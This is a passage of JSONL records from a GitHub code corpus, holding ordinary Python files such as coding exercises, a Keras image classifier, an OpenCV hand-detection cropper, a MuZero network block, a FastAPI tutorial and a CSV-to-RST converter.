test your function:\nprint(frequency_dictionary([\"apple\", \"apple\", \"cat\", 1]))\n# should print {\"apple\":2, 
\"cat\":1, 1:1}\nprint(frequency_dictionary([0,0,0,0,0]))\n# should print {0:5}\n","repo_name":"josejpalacios/codecademy-python3","sub_path":"Lesson 08: Dictionaries/Lesson 03: Code Challenges: Dictionaries/Challenge 08: Frequency Count.py","file_name":"Challenge 08: Frequency Count.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19078787822","text":"import time\nfrom utils.data_storage import DataStorage\n\n\nclass DataFile(DataStorage):\n def __init__(self, config):\n file_name = \"\"\n if config.getboolean('MAIN', 'store_together'):\n file_name = 'All_Tweets.json'\n super().__init__(config, file_name)\n\n def save(self, data, file_name):\n if not self._store_together:\n date_time = time.strftime(\"%Y-%m-%d\")\n file_name = date_time + \"_\" + file_name + \".json\"\n self._path_to_file = self._path + file_name\n with open(self._path_to_file, 'a') as f:\n f.write(str(data) + \"\\n\")\n\n def get_info(self):\n if self._store_together:\n return self._path_to_file\n else:\n return \"As json file in \" + self._path\n\n","repo_name":"ivosonntag/WennDasBierAlleIst","sub_path":"twitter/utils/data_file.py","file_name":"data_file.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28440060366","text":"\"\"\"\n\tAnderson Vieira's solution\n\tPlease don't copy this\n\"\"\"\nclass el:\n\tdef __init__(self, v, m):\n\t\tself.v = v\n\t\tself.m = m\n\n\tdef __lt__(self, other):\n\t\tms, mo = 0, 0\n\t\tif self.v < 0: ms = -((-self.v)%self.m)\n\t\telse: ms = self.v%self.m\n\n\t\tif other.v < 0: mo = -((-other.v)%self.m)\n\t\telse: mo = other.v%self.m\n\n\t\tif ms == mo:\n\t\t\tif self.v%2 != 0 and other.v%2 == 0:\n\t\t\t\treturn True\n\t\t\tif self.v%2 == 0 and other.v%2 != 0:\n\t\t\t\treturn False\n\t\t\tif self.v%2 == 0 and other.v%2 == 0:\n\t\t\t\treturn self.v < other.v\n\t\t\tif self.v%2 != 0 and other.v%2 != 0:\n\t\t\t\treturn self.v > other.v\n\t\treturn ms < mo\n\nn, m = map(int, input().split())\nwhile n != 0 and m != 0:\n\tarr = []\n\tfor i in range(n):\n\t\tx = int(input())\n\t\tarr.append(el(x, m))\n\n\tarr.sort()\n\tprint(n, m)\n\tfor i in range(n): print(arr[i].v)\n\tn, m = map(int, input().split())\nprint(n, m)","repo_name":"cap-nascimento/competitive-programming-solutions","sub_path":"uri/solutions/1000 - 1500/1252.py","file_name":"1252.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36180513844","text":"\"\"\"\nRun the Discord bot by running the directory.\n\"\"\"\n# Standard imports\nfrom os import getenv\n\n# Third party imports\nfrom dotenv import load_dotenv\n\n# Local imports\nfrom queue_bot import QueueBot, add_commands_to_bot\n\n\nif __name__ == '__main__':\n # Load in Discord token.\n load_dotenv()\n token = getenv('DISCORD_TOKEN')\n\n try:\n assert token is not None\n except AssertionError:\n raise EnvironmentError('No token found for the Discord bot in the .env file. 
Please see the readme for details.')\n\n # Create bot and run.\n bot = QueueBot(command_prefix='!')\n add_commands_to_bot(bot)\n bot.run(token)","repo_name":"alexandermjones/Discord-Queue-Bot","sub_path":"code/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40049371463","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nusage: cvt_csv_2_rst.py [-h] [-b ODOO_VER] [-m MAX_COL_WIDTH] [-n] [-q] [-V]\n [-v]\n src_file [dst_file]\n\nConvert csv file into xml file\n\npositional arguments:\n src_file\n dst_file\n\noptional arguments:\n -h, --help show this help message and exit\n -b ODOO_VER, --odoo-branch ODOO_VER\n -m MAX_COL_WIDTH, --max-col-width MAX_COL_WIDTH\n -n, --dry-run do nothing (dry-run)\n -q, --quiet silent mode\n -V, --version show program's version number and exit\n -v, --verbose verbose mode\n\"\"\"\n\nfrom __future__ import print_function, unicode_literals\nimport os\nimport sys\nimport time\nimport csv\nfrom os0 import os0\nfrom python_plus import _b, _c, _u\n\nif sys.version_info[0] == 2:\n from io import BytesIO\nelse:\n from io import StringIO\n\ntry:\n from z0lib import z0lib\nexcept ImportError:\n import z0lib\n\n\n__version__ = \"2.0.11\"\n\nmsg_time = time.time()\n\n\ndef msg_burst(text):\n global msg_time\n t = time.time() - msg_time\n if t > 3:\n print(text)\n msg_time = time.time()\n\n\ndef items_2_unicode(src):\n if isinstance(src, dict):\n for x in src.keys():\n src[x] = os0.u(src[x])\n elif isinstance(src, list):\n for i, x in enumerate(src):\n src[i] = os0.u(x)\n return src\n\n\ndef format_line(col_size, row, sep=None, flist=None):\n sep = sep or False\n flist = flist or row\n if sep:\n line = '+'\n else:\n line = '|'\n for i, p in enumerate(flist):\n if sep:\n line += '-' * (col_size[p] + 2)\n line += '+'\n elif isinstance(row, list):\n fmt_line = ' %%-%d.%ds |' % (col_size[p], col_size[p])\n line += fmt_line % row[i]\n else:\n fmt_line = ' %%-%d.%ds |' % (col_size[p], col_size[p])\n line += fmt_line % row[p]\n line += '\\n'\n return line\n\n\ndef convert_text(ctx, src_string):\n max_col_width = int(ctx['max_col_width'])\n csv.register_dialect(\n 'odoo', delimiter=_c(','), quotechar=_c('\\\"'), quoting=csv.QUOTE_MINIMAL\n )\n ctr = 0\n col_size = {}\n text = ''\n if sys.version_info[0] == 2:\n csv_fd = BytesIO(_b(src_string))\n else:\n csv_fd = StringIO(_u(src_string))\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='odoo'\n )\n for row in csv_obj:\n if not hdr_read:\n csv_obj.fieldnames = items_2_unicode(row['undef_name'])\n for p in csv_obj.fieldnames:\n col_size[p] = min(len(p), 16)\n hdr_read = True\n continue\n if row[csv_obj.fieldnames[0]][0:4] == '.. 
$':\n pass\n else:\n for p in csv_obj.fieldnames:\n col_size[p] = max(col_size[p], min(len(row[p]), max_col_width))\n csv_fd.close()\n if sys.version_info[0] == 2:\n csv_fd = BytesIO(_b(src_string))\n else:\n csv_fd = StringIO(_u(src_string))\n hdr_read = False\n csv_obj = csv.DictReader(\n csv_fd, fieldnames=[], restkey='undef_name', dialect='odoo'\n )\n for row in csv_obj:\n if not hdr_read:\n row['undef_name'] = items_2_unicode(row['undef_name'])\n csv_obj.fieldnames = row['undef_name']\n hdr_read = True\n text += format_line(col_size, row['undef_name'], sep=True)\n text += format_line(col_size, row['undef_name'])\n text += format_line(col_size, row['undef_name'], sep=True)\n continue\n row = items_2_unicode(row)\n if row[csv_obj.fieldnames[0]][0:4] == '.. $':\n text += row[csv_obj.fieldnames[0]]\n text += '\\n'\n else:\n ctr += 1\n text += format_line(col_size, row, flist=csv_obj.fieldnames)\n text += format_line(col_size, row, sep=True, flist=csv_obj.fieldnames)\n csv_fd.close()\n return text\n\n\ndef convert_file(ctx):\n if os.path.isfile(ctx['src_file']):\n if ctx['opt_verbose']:\n print(\"Reading %s\" % ctx['src_file'])\n with open(ctx['src_file'], 'r') as fd:\n src_string = _u(fd.read())\n target = convert_text(ctx, src_string)\n if not ctx['dst_file']:\n ctx['dst_file'] = ctx['src_file'][0:-4] + '.rst'\n if ctx['dst_file'] == '/dev/tty':\n print(target)\n else:\n if ctx['opt_verbose']:\n print(\"Writing %s\" % ctx['dst_file'])\n with open(ctx['dst_file'], 'w') as fd:\n fd.write(_c(target))\n\n\ndef main(cli_args=None):\n # if not cli_args:\n # cli_args = sys.argv[1:]\n parser = z0lib.parseoptargs(\n \"Convert csv file into xml file\",\n \"© 2018-2023 by SHS-AV s.r.l.\",\n version=__version__,\n )\n parser.add_argument('-h')\n parser.add_argument('-b', '--odoo-branch', action='store', dest='odoo_ver')\n parser.add_argument(\n '-m', '--max-col-width', action='store', dest='max_col_width', default=\"250\"\n )\n parser.add_argument('-n')\n parser.add_argument('-q')\n parser.add_argument('-V')\n parser.add_argument('-v')\n parser.add_argument('src_file')\n parser.add_argument('dst_file', nargs='?')\n ctx = items_2_unicode(parser.parseoptargs(sys.argv[1:]))\n return convert_file(ctx)\n","repo_name":"zeroincombenze/tools","sub_path":"wok_code/scripts/cvt_csv_2_rst.py","file_name":"cvt_csv_2_rst.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23109688171","text":"from argparse import ArgumentParser\nfrom common.load_data import load_flowers\nfrom common.util import decode_image_from_raw_bytes, merge_dict, read_raw_from_tar\nfrom common.util_keras import prepare_raw_bytes_for_model, reset_tf_session\nfrom keras.models import load_model\nfrom keras_model.image_classifier.hyperparams import get_constants\nfrom keras_model.image_classifier.model_setup import model_builder\nfrom keras_model.image_classifier.util import compile_model, train, train_generator\nimport matplotlib.pyplot as plt\nimport os\n\n\n# Training data\n# Takes 12 min and 400 MB.\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/index.html\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/102flowers.tgz\n# * http://www.robots.ox.ac.uk/~vgg/data/flowers/102/imagelabels.mat\n\n\ndef run(constant_overwrites):\n constants = merge_dict(get_constants(), constant_overwrites)\n tar_filename = constants['tar_filename']\n img_size = constants['img_size']\n\n train_files, test_files, train_labels, test_labels, n_classes = 
\\\n         load_flowers(os.path.dirname(os.path.abspath(__file__)))\n    data = {\n        'train_files': train_files,\n        'train_labels': train_labels,\n        'test_files': test_files,\n        'test_labels': test_labels,\n        'n_classes': n_classes\n    }\n\n    # test cropping\n    raw_bytes = read_raw_from_tar(tar_filename, 'jpg/image_00001.jpg')\n    img = decode_image_from_raw_bytes(raw_bytes)\n\n    print('')\n    print('original image shape:', img.shape)\n    print('')\n    plt.imshow(img)\n    plt.show()\n\n    img = prepare_raw_bytes_for_model(raw_bytes, img_size, normalize_for_model=False)\n    print('')\n    print('cropped image shape:', img.shape)\n    print('')\n    plt.imshow(img)\n    plt.show()\n\n    # remember to clear session if you start building graph from scratch!\n    # don't call K.set_learning_phase() !!! (otherwise will enable dropout\n    # in train/test simultaneously)\n    _ = reset_tf_session()  # returns session\n\n    model = model_builder(n_classes, constants)\n\n    print('')\n    print(model.summary())\n    print('')\n\n    compile_model(model, constants)\n\n    # model_file_exists = any(f.startswith('flowers') for f in os.listdir('.') if os.path.isfile(f))\n    last_finished_epoch = constants['last_finished_epoch']\n    if last_finished_epoch:\n        model = load_model(constants['model_filename'].format(last_finished_epoch))\n\n    train(model, data, constants)\n\n    # Accuracy on test set\n    test_accuracy = model.evaluate_generator(\n        train_generator(tar_filename, test_files, test_labels, n_classes, constants),\n        len(test_files) // constants['batch_size'] // 2\n    )[1]\n\n    print('\\nTest accuracy: %.5f' % test_accuracy)\n\n\nif __name__ == '__main__':\n    # read args\n    parser = ArgumentParser(description='Run Keras Image Classifier')\n    parser.add_argument('--epochs', dest='n_epochs', type=int, help='number epochs')\n    parser.add_argument('--last-finished-epoch', dest='last_finished_epoch', type=int,\n                        help='number of last finished epoch')\n    parser.add_argument('--batch-size', dest='batch_size', type=int, help='batch size')\n    parser.add_argument('--learning-rate', dest='learning_rate', type=float, help='learning rate')\n    parser.add_argument('--tar-filename', dest='tar_filename', help='data tar filename')\n    parser.add_argument('--imagenet', dest='use_imagenet', help='use imagenet flag', action='store_true')\n    parser.set_defaults(use_imagenet=True)\n    args = parser.parse_args()\n\n    run(vars(args))\n","repo_name":"markmo/dltemplate","sub_path":"src/keras_model/image_classifier/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"34598089062","text":"import cv2\nimport numpy as np\nimport random as rd\nimport time\nimport pickle\nimport os\nimport tensorflow as tf\nimport sys\n\n\nclass Image_detector ():\n    def __init__(self, show_boxes=True, thresh_rate=1, train_directory=None):\n        self.train_dir=train_directory\n        self.hand_cascade=cv2.CascadeClassifier(r'')\n        self.list=[]\n        self.show_boxes=show_boxes\n        self.thresh_rate=thresh_rate\n        self.crop_list=[]\n        try:\n            os.removedirs('images_folder')\n            os.remove('predictions.bat')\n        except Exception as e:\n            pass\n\n        try:\n            os.makedirs('images_folder')\n        except Exception as e:\n            pass\n        self.image_processor()\n        self.retrieve_data()\n\n    def save_images (self, frame):\n        r=rd.randint(1, 1000)\n        cv2.imwrite(\"images_folder\\\\hand_image{}.jpeg\".format(str(r)), frame)\n    \n    def detect (self, gray_image, orig_frame):\n        hand=self.hand_cascade.detectMultiScale(gray_image,3, 2)\n        for (x, y, w, h) in hand:\n            if
 self.show_boxes==True:\n                cv2.rectangle(orig_frame, (x,y), (x+w,y+h), (0,255,0), 2)\n                self.list.append([x, y, w, h])\n                time.sleep(self.thresh_rate)\n                self.save_images(orig_frame)\n            else:\n                self.list.extend([x, y, w, h])\n                time.sleep(self.thresh_rate)\n                self.save_images(orig_frame)\n\n        return orig_frame\n    def image_processor (self):\n        \"\"\"\n        The function where the model gets the frame of the webcam and preprocesses it to\n        the detect function\n\n        Returns:\n            [type]: [description]\n        \"\"\"\n        vid=cv2.VideoCapture(0)\n\n        while True:\n            nothing, frame=vid.read()\n            gray_scale=cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n            \n            our_reslut=self.detect(gray_image=gray_scale, orig_frame=frame)\n            cv2.imshow('vidheo', our_reslut)\n\n            if cv2.waitKey(1) & 0xFF == ord('q'): \n                break\n\n        vid.release()\n        cv2.destroyAllWindows()\n        return self.list\n\n    def retrieve_data (self):\n        self.file_handler()\n        with open('predictions.bat', 'rb') as f:\n            while True:\n                try:\n                    ans=pickle.load(f)\n                    self.crop_list.append(ans.split('-'))\n                except EOFError:\n                    break\n        self.crop_images()\n\n    def crop_images(self):\n        os.makedirs('data_full')\n        for m in range (len(self.crop_list)):\n            data=self.crop_list[m][0]\n\n            new_image=cv2.imread(data)\n            y=int(self.crop_list[m][2])\n            x=int(self.crop_list[m][1])\n            h=int(self.crop_list[m][4])\n            w=int(self.crop_list[m][3])\n            \n            new_img=new_image[y:y+h, x:x+w]\n            os.remove(data)\n            cv2.imwrite(data, new_img)\n\n\n    def file_handler (self):\n        \"\"\"\n        This is a function that appends the data to the `predictions.bat` file\n        which contains the essential info for the cropping of the image\n\n        \"\"\"\n        with open('predictions.bat', 'wb') as f:\n            for (roots, dirs, files) in os.walk('images_folder'):\n                for i in range (len(files)):\n                    images='images_folder'+'\\\\'+files[i]\n                    print (self.list[i])\n                    resluts=f\"{images}-{self.list[i][0]}-{self.list[i][1]}-{self.list[i][2]}-{self.list[i][3]}\"\n                    pickle.dump(resluts, f)\n            f.close()\n\n    def model_preds (self, model_path):\n        \"\"\"\n        This method helps in predicting the cropped images lists, \n        and writing it into a batch file.\n\n        Args:\n            model_path ([path]): The path where the model has been saved\n        \"\"\"\n\n        f=open('predictions_model.bat', 'wb')\n\n        model=tf.keras.models.load_model(model_path)\n\n        # Walk the capture folder and predict on each image; the original\n        # range(len(files) for ...) generator call raised a TypeError.\n        for _, _, files in os.walk('images_folder'):\n            for i in range(len(files)):\n                image=tf.io.read_file('images_folder\\\\'+files[i])\n                image=tf.image.decode_image(image)\n                image=tf.image.resize(images=image, size=(200, 200))\n                image=image/255.\n                image=tf.expand_dims(image, 0) # add the batch dimension model.predict expects\n\n                classes=sorted(os.listdir(self.train_dir))\n                preds=model.predict(image)\n                preds=classes[int(preds.argmax())]\n\n                answer=f\"images_folder\\\\{files[i]}:{preds}\"\n                pickle.dump(answer, f)\n        f.close()\n\na=Image_detector(thresh_rate=0.5)\n","repo_name":"Chiraagkv/ASL","sub_path":"progress_files/Image_cap.py","file_name":"Image_cap.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"41799025476","text":"from tensorflow import keras\n\nkl = keras.layers\n\n\"\"\"\nPaper\nhttps://arxiv.org/abs/1911.08265\n\nRef\nhttps://github.com/horoiwa/deep_reinforcement_learning_gallery\n\"\"\"\n\n\nclass MuZeroAtariBlock(keras.Model):\n    def __init__(\n        self,\n        filters: int = 128,\n        kernel_size=(3, 3),\n        l2: float = 0.0001,\n        use_layer_normalization: bool = True,\n        **kwargs,\n    ):\n        super().__init__(**kwargs)\n\n        self.conv1 = kl.Conv2D(\n            filters,\n            kernel_size=kernel_size,\n            strides=2,\n            padding=\"same\",\n            activation=\"relu\",\n            use_bias=False,\n            
kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n self.resblock1 = _ResidualBlock(filters, kernel_size, l2, use_layer_normalization)\n self.resblock2 = _ResidualBlock(filters, kernel_size, l2, use_layer_normalization)\n self.conv2 = kl.Conv2D(\n filters * 2,\n kernel_size=kernel_size,\n strides=2,\n padding=\"same\",\n activation=\"relu\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n self.resblock3 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock4 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock5 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.pool1 = kl.AveragePooling2D(pool_size=3, strides=2, padding=\"same\")\n self.resblock6 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock7 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.resblock8 = _ResidualBlock(filters * 2, kernel_size, l2, use_layer_normalization)\n self.pool2 = kl.AveragePooling2D(pool_size=3, strides=2, padding=\"same\")\n\n def call(self, x):\n x = self.conv1(x)\n x = self.resblock1(x)\n x = self.resblock2(x)\n x = self.conv2(x)\n x = self.resblock3(x)\n x = self.resblock4(x)\n x = self.resblock5(x)\n x = self.pool1(x)\n x = self.resblock6(x)\n x = self.resblock7(x)\n x = self.resblock8(x)\n x = self.pool2(x)\n return x\n\n\nclass _ResidualBlock(keras.Model):\n def __init__(\n self,\n filters,\n kernel_size,\n l2,\n use_layer_normalization: bool = True,\n **kwargs,\n ):\n super().__init__(**kwargs)\n\n self.conv1 = kl.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n padding=\"same\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n if use_layer_normalization:\n self.bn1 = kl.LayerNormalization()\n else:\n self.bn1 = kl.BatchNormalization()\n self.relu1 = kl.ReLU()\n self.conv2 = kl.Conv2D(\n filters=filters,\n kernel_size=kernel_size,\n padding=\"same\",\n use_bias=False,\n kernel_initializer=\"he_normal\",\n kernel_regularizer=keras.regularizers.l2(l2),\n )\n if use_layer_normalization:\n self.bn2 = kl.LayerNormalization()\n else:\n self.bn2 = kl.BatchNormalization()\n self.relu2 = kl.ReLU()\n\n def call(self, x):\n x1 = self.conv1(x)\n x1 = self.bn1(x1)\n x1 = self.relu1(x1)\n x1 = self.conv2(x1)\n x1 = self.bn2(x1)\n x = x + x1\n x = self.relu2(x)\n return x\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/rl/models/alphazero/tf/muzero_atari_block.py","file_name":"muzero_atari_block.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"11765460529","text":"import enum\nimport typing\n\nimport fastapi\nimport uvicorn\nimport pydantic\n\n\nclass ModelName(str, enum.Enum):\n alexnet = 'alexnet'\n resnet = 'resnet'\n letnet = 'letnet'\n\n\nclass Item(pydantic.BaseModel):\n name: str\n description: typing.Optional[str] = None\n price: float\n tax: typing.Optional[float] = None\n\n\napp = fastapi.FastAPI()\n\n\nfake_items_db = [\n {'item_name': 'Foo'},\n {'item_name': 'Bar'},\n {'item_name': 'Baz'},\n]\n\n\n@app.get('/')\nasync def root():\n return {'message': 'Hello World'}\n\n\n@app.get('/items/{item_id}')\nasync def item(item_id: int):\n return {'item_id': item_id}\n\n\n@app.get('/users/me')\nasync def read_user_me():\n return {'user_id': 'the current 
user'}\n\n\n@app.get('/users/{user_id}')\nasync def read_user(user_id: str):\n return {'user_id': user_id}\n\n\n@app.get('/models/{model_name}')\nasync def get_model(model_name: ModelName):\n if model_name == ModelName.alexnet:\n return {'model_name': model_name, 'message': 'Deep Learning FTW!'}\n\n if model_name.value == 'letnet':\n return {'model_name': model_name, 'message': 'LeCNN all the images'}\n\n return {'model_name': model_name, 'message': 'Have some residuals'}\n\n\n@app.get('/files/{file_path:path}')\nasync def read_file(file_path: str):\n return {'file_path': file_path}\n\n\n@app.get('/items/')\nasync def read_item(skip: int = 0, limit: int = 10):\n return fake_items_db[skip: skip + limit]\n\n\n@app.get('/users/{user_id}/items/{item_id}')\nasync def read_item_query(\n user_id: int,\n item_id: str,\n q: typing.Optional[str] = None,\n short: bool = False\n):\n item = {'item_id': item_id, 'owner_id': user_id}\n if q:\n item.update({'q': q})\n if not short:\n item.update(\n {\n 'description': (\n 'This is an amazing item that has a long description'\n )\n }\n )\n return item\n\n\n@app.get('/items_user/{item_id}')\nasync def read_user_item(\n item_id: str,\n needy: str,\n skip: int = 0,\n limit: typing.Optional[int] = None\n):\n return {'item_id': item_id, 'needy': needy, 'skip': skip, 'limit': limit}\n\n\n@app.post('/items/')\nasync def create_item(item: Item):\n item_dict = item.dict()\n\n if item.tax:\n price_with_tax = item.price + item.tax\n item_dict.update({'price_with_tax': price_with_tax})\n return item_dict\n\n\n@app.put('/items/{item_id}')\nasync def update_item(item_id: int, item: Item, q: typing.Optional[str] = None):\n result = {'item_id': item_id, **item.dict()}\n if q:\n result.update({'q': q})\n return result\n\n\n@app.get('/read_items/')\nasync def read_items(\n q: typing.Optional[str] = fastapi.Query(None, min_length=3, max_length=10)\n):\n results = {'items': [{'item_id': 'Foo'}, {'item_id': 'Bar'}]}\n if q:\n results.update({'q': q})\n return results\n\n\n@app.get('/cnpj/')\nasync def read_items(\n cnpj: str = fastapi.Query(..., regex='^\\d{2}\\.\\d{3}\\.\\d{3}/\\d{4}\\-\\d{2}$')\n):\n return {'cnpj': cnpj}\n\n\n@app.get('/cnpjs/')\nasync def cnpjs(c: typing.Optional[typing.List[str]] = fastapi.Query(None)):\n return {'c': c}\n\n\n@app.get('/cpfs/')\nasync def cpfs(c: typing.List[str] = fastapi.Query(['456', '123'])):\n return {'c': c}\n\n\n@app.get('/xelo/')\nasync def cpfs(\n c: typing.Optional[str] = fastapi.Query(\n None,\n title='cnjs',\n description='cnjs numbers',\n alias='item-query',\n deprecated=True\n ),\n):\n return {'c': c}\n\n\nif __name__ == '__main__':\n uvicorn.run('app:app', reload=True, debug=True)\n","repo_name":"RonaldTheodoro/fastapi-tutorial","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18749555858","text":"#!/usr/bin/env python3\n# https://www.hackerrank.com/challenges/py-collections-ordereddict\n# #python\n\nimport collections\nimport io\nimport sys\nimport unittest\n\n\ndef aggregate(purchases):\n aggregated = collections.OrderedDict()\n for product, payment in purchases:\n if product in aggregated:\n aggregated[product] += payment\n else:\n aggregated[product] = payment\n return aggregated\n\n\ndef main():\n n = int(input().strip())\n purchases = []\n for _ in range(n):\n items = input().strip().split()\n product = ' '.join(items[:-1])\n payment = int(items[-1])\n 
purchases.append((product, payment))\n aggregated = aggregate(purchases)\n for product in aggregated:\n print('%s %d' % (product, aggregated[product]))\n\n\nif __name__ == '__main__': # pragma: no cover\n main()\n\n\nclass TestCode(unittest.TestCase):\n def generalized_test(self, which):\n sys.stdin = open(__file__.replace('.py', f'.{which}.in'), 'r')\n sys.stdout = io.StringIO()\n expected = open(__file__.replace('.py', f'.{which}.out'), 'r')\n main()\n self.assertEqual(sys.stdout.getvalue(), expected.read())\n for handle in [sys.stdin, sys.stdout, expected]:\n handle.close()\n\n def test_0(self):\n self.generalized_test('0')\n","repo_name":"altermarkive/training","sub_path":"algorithms/code/hackerrank/py_collections_ordereddict/test_py_collections_ordereddict.py","file_name":"test_py_collections_ordereddict.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"26279543915","text":"import argparse\nfrom collections import Counter\nfrom qair.data.utils import create_path, list_files\nfrom qair.data.dataset import QAdataset\nfrom itertools import chain\nimport logging\n\ndef giff_words(dataset, lower=True):\n\n def process(x):\n if lower:\n return x.lower().split()\n else:\n return x.split()\n\n for ex in dataset.iterator():\n for word in chain(process(ex.question), process(ex.passage)):\n yield word\n\n\n\nif __name__=='__main__':\n logging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)\n logging.info('-'*50)\n parser = argparse.ArgumentParser(description='Create the vocabulary')\n parser.add_argument(\"dataset\", help=\"dataset name\")\n parser.add_argument(\"--only_train\", dest='onlytrain', help=\"lowercased\", action='store_true')\n parser.add_argument('--lower', dest='lower', help=\"lowercased\", action='store_true')\n parser.add_argument('--top_n', dest='n', help=\"the max number of words to keep\", type=int)\n args = parser.parse_args()\n\n def process(dataset, lower=True):\n datasets = []\n inp_path = f'data/parsed/{dataset}/'\n for inp_file, _ in list_files(inp_path, inp_path):\n if not args.onlytrain or inp_file.endswith('train.json'):\n datasets.append(QAdataset(inp_file))\n return Counter(chain(*(giff_words(dataset, lower) for dataset in datasets)))\n\n vocabulary = process(args.dataset, args.lower)\n with open(create_path(f'data/info/{args.dataset}/vocab.tsv'), 'w') as ofile:\n top_n = vocabulary.most_common(args.n)\n logging.info(f'{args.dataset}: {len(top_n)} words')\n for word, freq in vocabulary.most_common(args.n):\n ofile.write(f'{word}\\t{freq}\\n')\n\n","repo_name":"dbonadiman/qa-ir","sub_path":"qair/data/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1154201473","text":"#%% [markdown]\n# Stage 3 - Join Data\n\n# ## Common\n# So this is where we are trying to do all the common stuff to ingest all of the files. 
Key is recognition that there are common patterns we can exploit across the files.\n# NOTE - still to figure out how to do this from a single file and import it successfully.\n\n#%%\n# Import all of the libraries we need to use...\nimport pandas as pd\nimport azureml.dataprep as dprep\nimport seaborn as sns\nimport os as os\nimport re as re\nimport collections\nfrom azureml.dataprep import value\nfrom azureml.dataprep import col\nfrom commonCode import savePackage, openPackage, createFullPackagePath\n\n# Path to the source data\ndataPath = \"./data\"\n\n# Path to the location where the dataprep packags that are created\npackagePath = \"./packages\"\n\n# Name of package file\npackageFileSuffix = \"_package.dprep\"\n\n#%% [markdown]\n# ## Open PEOPLE and MEMBERS data flows from stage 2\n# Simply pick up the data flows from stage 2...\n\n#%%\npeopleDataFlow = openPackage('PEOPLE', '2', 'A')\nmembersDataFlow = openPackage('MEMBERS', '2', 'A')\n\n#%% [markdown]\n# ## Join the PEOPLE and MEMBERS data flows\n# Crunch time! Let's see if we can get these cleaned up data sets to join.\n\n#%%\njoin_builder = peopleDataFlow.builders.join(right_dataflow=membersDataFlow, left_column_prefix='l', right_column_prefix='r')\njoin_builder.detect_column_info()\njoin_builder\n\n#%%\njoin_builder.generate_suggested_join()\njoin_builder.list_join_suggestions()\n\n#%% [markdown]\n# Weird, it doesn't come up with a suggestion despite having two MEMNO integer columns to work with!\n\n#%%\njoinedDataFlow = dprep.Dataflow.join(left_dataflow=peopleDataFlow,\n right_dataflow=membersDataFlow,\n join_key_pairs=[('ID', 'PEOPLEID')],\n left_column_prefix='PEOPLE_',\n right_column_prefix='MEMBERS_')\n\n#%%\njoinedDataFlow.head(5)\n\n#%%\njoinedDataFlow.get_profile()\n\n#%% [markdown]\n# Just running a couple of checks now to see how well the join has worked:\n\n#%%\nprint('PEOPLE row count = {0}'.format(peopleDataFlow.row_count))\nprint('MEMBERS row count = {0}'.format(membersDataFlow.row_count))\nprint('JOINED row count = {0}'.format(joinedDataFlow.row_count))\n\n#%%\norphanedPeopleDataFlow = joinedDataFlow.filter(joinedDataFlow['MEMBER_PEOPLEID'] == None)\norphanedPeopleDataFlow.head(20)\n\n#%% [markdown]\n# ## Save JOINED data\n# Finally save the JOINED data flow that comes out of stage 3 for consumption downstream\n\n#%%\nfullPackagePath = savePackage(joinedDataFlow, 'JOINED', '3', 'A')\nprint('Saved package to file {0}'.format(fullPackagePath))\n\n","repo_name":"Smartitect/dataprep","sub_path":"scratches/notebook99_joinData.py","file_name":"notebook99_joinData.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11872105579","text":"import os\nimport cv2\nimport h5py\nimport random\nimport argparse\nimport numpy as np\nimport subprocess as sp\n\nimport torch\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nfrom PIL import Image\nfrom tensorboardX import SummaryWriter\nfrom sklearn import metrics\nfrom sklearn.cluster import MiniBatchKMeans\nfrom exploring_exploration.models.reconstruction import FeatureNetwork\n\n\nclass RGBDataset(Dataset):\n def __init__(\n self, dataset_root, seed=123, transform=None, image_size=256, truncate_count=-1,\n ):\n random.seed(seed)\n self.dataset_root = 